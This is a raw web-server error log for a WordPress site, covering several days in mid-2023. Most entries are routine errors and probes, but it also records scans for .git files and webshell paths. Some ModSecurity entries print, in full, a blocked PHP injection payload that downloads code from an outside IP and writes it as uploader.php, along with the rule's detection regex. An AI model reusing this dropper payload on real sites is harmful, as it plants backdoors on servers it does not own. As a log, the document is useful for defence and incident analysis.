[Sat Jul 29 00:40:50.649957 2023] [autoindex:error] [pid 13368:tid 140534609831680] [client 20.10.199.198:44992] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Jul 29 03:05:14.068195 2023] [autoindex:error] [pid 13461:tid 140534559475456] [client 20.88.32.197:54864] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Jul 29 03:07:22.808030 2023] [ssl:warn] [pid 10875:tid 140479961122688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 29 03:07:27.302008 2023] [ssl:warn] [pid 10881:tid 140479961122688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 29 03:07:29.122965 2023] [ssl:warn] [pid 10881:tid 140479961122688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 29 03:07:32.011126 2023] [ssl:warn] [pid 10881:tid 140479961122688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 29 03:07:34.304452 2023] [ssl:warn] [pid 11483:tid 140696741758848] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 29 03:07:38.769975 2023] [ssl:warn] [pid 11485:tid 140696741758848] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 29 08:40:13.620471 2023] [autoindex:error] [pid 11506:tid 140696426088192] [client 13.67.213.175:54344] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Jul 29 17:09:30.859012 2023] [autoindex:error] [pid 11507:tid 140696392517376] [client 35.221.57.138:33544] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Sat Jul 29 17:53:16.388196 2023] [autoindex:error] [pid 11601:tid 140696417695488] [client 20.207.201.5:36532] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Jul 29 23:53:49.746460 2023] [autoindex:error] [pid 11601:tid 140696484837120] [client 162.240.4.85:33014] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/ID3/index.php [Sat Jul 29 23:53:49.757934 2023] [autoindex:error] [pid 11506:tid 140696333768448] [client 162.240.4.85:33016] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/ID3/index.php [Sun Jul 30 03:19:26.560460 2023] [ssl:warn] [pid 10957:tid 140051924227968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 30 03:19:30.934608 2023] [ssl:warn] [pid 10961:tid 140051924227968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 30 03:19:32.826683 2023] [ssl:warn] [pid 10961:tid 140051924227968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 30 03:19:36.902368 2023] [ssl:warn] [pid 10961:tid 140051924227968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 30 03:19:40.051184 2023] [ssl:warn] [pid 11442:tid 139914661816192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 30 03:19:44.335631 2023] [ssl:warn] [pid 11445:tid 139914661816192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 30 17:15:28.620273 2023] [ssl:warn] [pid 1015:tid 140649124775808] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 30 17:15:35.663725 2023] [ssl:warn] [pid 1694:tid 140649124775808] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 30 19:09:19.604036 2023] [ssl:warn] [pid 1694:tid 140649124775808] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 30 19:09:33.434537 2023] [autoindex:error] [pid 24036:tid 140648925247232] [client 20.10.206.131:60466] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Jul 30 21:42:29.566287 2023] [autoindex:error] [pid 24036:tid 140648820758272] [client 74.208.18.119:44892] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2023/07/30 22:19:18 [error] 23893#23893: *16643 access forbidden by rule, client: 45.135.57.26, server: mail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "mail.investigacionperu.com" [Sun Jul 30 22:29:54.860262 2023] [ssl:warn] [pid 1694:tid 140649124775808] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 30 22:46:14.551529 2023] [ssl:warn] [pid 1694:tid 140649124775808] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 30 22:46:36.111317 2023] [ssl:warn] [pid 1694:tid 140649124775808] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 30 22:57:22.705167 2023] [ssl:warn] [pid 11590:tid 139874974746496] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 30 22:57:26.938277 2023] [ssl:warn] [pid 11617:tid 139874974746496] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 30 23:28:09.655288 2023] [ssl:warn] [pid 23582:tid 139657590806400] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 30 23:28:15.947185 2023] [ssl:warn] [pid 23616:tid 139657590806400] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 30 23:28:51.322501 2023] [ssl:warn] [pid 23616:tid 139657590806400] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 30 23:32:10.487734 2023] [ssl:warn] [pid 28743:tid 140240492967808] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 30 23:32:14.694030 2023] [ssl:warn] [pid 28762:tid 140240492967808] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 31 03:09:22.249406 2023] [ssl:warn] [pid 4857:tid 140403966248832] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 31 03:09:28.529876 2023] [ssl:warn] [pid 4863:tid 140403966248832] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 31 03:09:30.512099 2023] [ssl:warn] [pid 4863:tid 140403966248832] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 31 03:09:32.284467 2023] [ssl:warn] [pid 4863:tid 140403966248832] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 31 03:09:34.562253 2023] [ssl:warn] [pid 5350:tid 140161203296128] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 31 03:09:40.823240 2023] [ssl:warn] [pid 5352:tid 140161203296128] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 31 04:41:45.651116 2023] [autoindex:error] [pid 5380:tid 140160995374848] [client 141.94.87.67:42046] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/images/index.php [Mon Jul 31 04:57:48.080521 2023] [:error] [pid 5379:tid 140160838637312] [client 94.102.208.129:42920] [client 94.102.208.129] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:index[]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: call_user_func found within ARGS:index[]: call_user_func"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-include.php"] [unique_id "ZMeFnLgm7cYHPjNAvQ8GlwAAAE0"], referer: investigacionperu.com [Mon Jul 31 09:44:11.578025 2023] [autoindex:error] [pid 5380:tid 140160830244608] [client 54.170.158.220:33574] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/wp-content/uploads/index.php [Mon Jul 31 09:44:17.942682 2023] [autoindex:error] [pid 5378:tid 140160880600832] [client 103.216.188.68:33600] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/wp-content/uploads/index.php [Mon Jul 31 13:26:55.179484 2023] [:error] [pid 9257:tid 140160763102976] [client 91.134.248.249:52208] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php, referer: http://simplesite.com [Mon Jul 31 16:34:20.361718 2023] [autoindex:error] [pid 9328:tid 140160805066496] [client 81.18.164.166:37396] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/wp-content/uploads/index.php [Tue Aug 01 03:29:39.967148 2023] [autoindex:error] [pid 9257:tid 140160805066496] [client 20.40.51.137:55500] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Aug 01 03:50:37.429283 2023] [ssl:warn] [pid 25646:tid 140618721503104] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Aug 01 03:50:41.705123 2023] [ssl:warn] [pid 25648:tid 140618721503104] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Aug 01 03:50:44.126781 2023] [ssl:warn] [pid 25648:tid 140618721503104] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Aug 01 03:50:46.130075 2023] [ssl:warn] [pid 25648:tid 140618721503104] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Aug 01 03:50:49.956957 2023] [ssl:warn] [pid 26152:tid 139966727919488] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Aug 01 03:50:54.239377 2023] [ssl:warn] [pid 26154:tid 139966727919488] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Aug 01 04:18:00.424623 2023] [autoindex:error] [pid 26290:tid 139966474614528] [client 52.173.187.25:58602] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Aug 01 13:12:45.443894 2023] [autoindex:error] [pid 28232:tid 139966382294784] [client 41.216.188.164:42962] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Tue Aug 01 20:04:25.137351 2023] [autoindex:error] [pid 26290:tid 139966348723968] [client 74.249.156.7:37440] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Aug 02 00:50:35.108781 2023] [:error] [pid 26174:tid 139966382294784] [client 85.209.176.30:56532] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php, referer: www.google.com [Wed Aug 02 03:09:35.248566 2023] [ssl:warn] [pid 20834:tid 140083271837568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Aug 02 03:09:39.457202 2023] [ssl:warn] [pid 20835:tid 140083271837568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Aug 02 03:09:40.740604 2023] [ssl:warn] [pid 20835:tid 140083271837568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Aug 02 03:09:42.626122 2023] [ssl:warn] [pid 20835:tid 140083271837568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Aug 02 03:09:44.954149 2023] [ssl:warn] [pid 21283:tid 140536533268352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Aug 02 03:09:51.221850 2023] [ssl:warn] [pid 21286:tid 140536533268352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Aug 02 03:09:52.182665 2023] [ssl:warn] [pid 21286:tid 140536533268352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Aug 02 08:00:09.675405 2023] [:error] [pid 21555:tid 140536308561664] [client 52.173.186.190:57080] [client 52.173.186.190] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZMpTWb5gtJOyiumzhej_UQAAAUU"], referer: www.google.com [Wed Aug 02 10:47:39.300064 2023] [autoindex:error] [pid 21555:tid 140536308561664] [client 40.78.155.187:39680] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Aug 02 22:18:31.077801 2023] [:error] [pid 21555:tid 140536094586624] [client 20.117.80.169:35380] [client 20.117.80.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZMsch75gtJOyiumzhegVfgAAAVY"], referer: www.google.com [Thu Aug 03 03:42:25.404128 2023] [ssl:warn] [pid 5170:tid 140628319430528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Aug 03 03:42:29.660813 2023] [ssl:warn] [pid 5173:tid 140628319430528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Aug 03 03:42:30.236543 2023] [ssl:warn] [pid 5173:tid 140628319430528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Aug 03 03:42:32.277997 2023] [ssl:warn] [pid 5173:tid 140628319430528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Aug 03 03:42:34.713594 2023] [ssl:warn] [pid 5618:tid 140035981703040] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Aug 03 03:42:39.002893 2023] [ssl:warn] [pid 5619:tid 140035981703040] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Aug 03 06:41:03.404282 2023] [autoindex:error] [pid 6373:tid 140035613464320] [client 40.122.213.160:57580] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Thu Aug 03 06:41:43.439189 2023] [autoindex:error] [pid 6373:tid 140035714176768] [client 40.122.213.160:57660] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Thu Aug 03 06:41:46.017289 2023] [:error] [pid 5645:tid 140035579893504] [client 40.122.213.160:57664] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php, referer: www.google.com 2023/08/03 08:28:31 [error] 5598#5598: *233587 access forbidden by rule, client: 3.19.79.64, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Aug 03 09:34:07.109547 2023] [:error] [pid 5645:tid 140035546322688] [client 85.209.176.30:38698] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/install.php, referer: www.google.com [Thu Aug 03 09:43:11.714836 2023] [:error] [pid 5645:tid 140035638642432] [client 85.209.176.30:39200] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php, referer: www.google.com [Thu Aug 03 09:50:50.477861 2023] [:error] [pid 6373:tid 140035621857024] [client 85.209.176.30:39566] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/install.php, referer: www.google.com [Thu Aug 03 09:52:13.033505 2023] [:error] [pid 6373:tid 140035588286208] [client 85.209.176.30:39698] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/gmel.php, referer: www.google.com [Thu Aug 03 17:55:19.861813 2023] [autoindex:error] [pid 5644:tid 140035730962176] [client 13.67.220.117:33938] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Aug 04 03:04:02.958160 2023] [autoindex:error] [pid 5644:tid 140035588286208] [client 20.117.80.169:58620] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Aug 04 03:41:26.271096 2023] [ssl:warn] [pid 32184:tid 140718847244160] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Aug 04 03:41:32.569837 2023] [ssl:warn] [pid 32187:tid 140718847244160] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Aug 04 03:41:34.293496 2023] [ssl:warn] [pid 32187:tid 140718847244160] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Aug 04 03:41:35.891203 2023] [ssl:warn] [pid 32187:tid 140718847244160] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Aug 04 03:41:38.160489 2023] [ssl:warn] [pid 32637:tid 140160436107136] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Aug 04 03:41:44.389801 2023] [ssl:warn] [pid 32639:tid 140160436107136] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Aug 04 06:16:15.003618 2023] [:error] [pid 404:tid 140160134010624] [client 128.199.179.16:40756] [client 128.199.179.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:index[]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: call_user_func found within ARGS:index[]: call_user_func"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-include.php"] [unique_id "ZMzd_xirS_DJyZqzjOdgRgAAAMY"], referer: investigacionperu.com [Fri Aug 04 07:32:15.940570 2023] [:error] [pid 404:tid 140160066868992] [client 4.150.19.187:45012] [client 4.150.19.187] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri 